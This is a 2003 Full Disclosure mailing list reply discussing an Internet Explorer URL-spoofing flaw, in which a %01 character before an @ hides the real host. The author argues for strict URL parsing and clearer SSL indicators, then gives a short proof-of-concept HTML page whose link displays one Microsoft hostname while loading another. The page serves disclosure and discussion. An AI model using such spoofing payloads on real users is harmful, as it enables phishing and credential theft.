Full Disclosure mailing list archives

Re: Re: Internet Explorer URL parsing vulnerability

From: "Erik van Straten" <emvs.fd.3FB4D11C () cpo tn tudelft nl>
Date: Fri, 12 Dec 2003 13:49:06 +0100

Hi all,

On Wed, 10 Dec 2003 13:01:42 -0500 Valdis Kletnieks wrote:

Most reasonable software will put in an outline-box or "\NNN", or
other similar indication a glyph is not displayable in the charset
in use, and then *continue trying* to render the rest of the
string.


I disagree that software should attempt to continue parsing URL's
(and *ML code for that matter) after an error or if something
unexpected happens. This is asking for lots of new vulns. Instead,
everything should come to a halt and a "page" or errorbox should
say "Bad URL syntax".

An IE warningbox for "legitimate" use of @ in URL's would be great.

In case of SSL, the lock icon should *immediately* disappear, and
an (optional) warningbox should popup, if the hostname in the cert
no longer matches *either* the one displayed in the URL combobox
*or* the actual underlaying connection. Also, probably it is a good
idea to have the page turn blank (or have a red cross) as soon as
the displayed URL doesn't match the connection (for example if
someone starts to manually edit the URL, but eventually does not
press enter).

Now for the fun part.

Some people have rightfully expressed their concerns whether
https://www.betaplace.com actually is a Microsoft site (it is).

To confirm, visit https://www.betaplace.microsoft.com ; it works,
however currently the certificate is invalid (hostname mismatch).

Here's my tip for Microsoft (acks to Petard :)
Save to file whatever.htm, and open that in MSIE:

-------------- start cut here -------------
<HTML><BODY>
<a href="https://www.betaplace.microsoft.com";
onclick="location.href=unescape(

'https://www.betaplace.microsoft.com%01 () www betaplace com/betaplace/sign-in/betaplace.asp'

); return false;">
Visit the *REAL* Microsoft's BetaPlace site</a>
</BODY></HTML>
-------------- end cut here -------------

Note: if the line with '' in the middle wraps, unwrap it before
saving to the htm file. There shouldn't be any spaces in it. The
blank lines in between are okay.

Cheers,
Erik

On Thu, 11 Dec 2003 19:20:14 +0000 Petard wrote:

It gets better... it works with SSL sites as well. The little lock, and
no warning message:
http://petard.freeshell.org/hotmail-pr.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Re: RE:Re: RE: FWD: Internet Explorer URL parsing vulnerability, (continued)
- - Re: RE:Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 10)
- RE: Re: Internet Explorer URL parsing vulnerability Schmehl, Paul L (Dec 10)
  - RE: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 11)
  - RE: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 12)
- RE: Re: Internet Explorer URL parsing vulnerability Funk Jr, Joseph C. (Dec 11)
  - RE: Re: Internet Explorer URL parsing vulnerability Jarkko Turkulainen (Dec 11)
  - Re: Re: Internet Explorer URL parsing vulnerability petard (Dec 11)
- RE: Re: Internet Explorer URL parsing vulnerability Schmehl, Paul L (Dec 11)
  - Re: Re: Internet Explorer URL parsing vulnerability petard (Dec 11)
    - Re: Re: Internet Explorer URL parsing vulnerability John Sage (Dec 11)
    - Re: Re: Internet Explorer URL parsing vulnerability Erik van Straten (Dec 12)
- Re: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 12)
  - Re: Re: Internet Explorer URL parsing vulnerability Georgi Guninski (Dec 12)